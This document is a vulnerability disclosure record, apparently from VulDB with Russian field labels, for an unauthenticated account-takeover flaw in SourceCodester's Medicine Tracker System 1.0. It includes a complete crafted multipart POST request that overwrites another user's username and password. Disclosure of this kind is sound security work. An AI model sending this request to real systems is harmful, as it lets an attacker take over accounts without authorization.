| Название | Medicine Tracker System Improper Access Control |
|---|
| Описание | An Improper Access Control has beed discovered in Medicine Tracker System. A remote and unauthenticated attacker can exploit this vulnerability by sending a crafted request, successful exploitation could allow attakers to change any users username and password.
The vulneravle URI is POST /php-mts/classes/Users.php?f=save_user. When the value of ' name="id" ' is correct, then an attacker could change the related username ,password and other informations. Cookie is not necessary for this operation, which means attackers could exploit it without authentication.
An malicous request is below
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
**********************************************************
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="id"
2
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="firstname"
a
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="middlename"
b
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="lastname"
c
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="username"
foo
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="password"
foo123
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z--
Then the relevant user with id=2 will be set as foo/foo123 |
|---|
| Источник | ⚠️ https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html |
|---|
| Пользователь | WWesleywww (UID 43117) |
|---|
| Представление | 17.03.2023 09:18 (3 лет назад) |
|---|
| Модерация | 17.03.2023 12:19 (3 hours later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 223311 [SourceCodester Medicine Tracker System 1.0 Users.php?f=save_user firstname/middlename/lastname/username/password слабая аутентификация] |
|---|
| Баллы | 20 |
|---|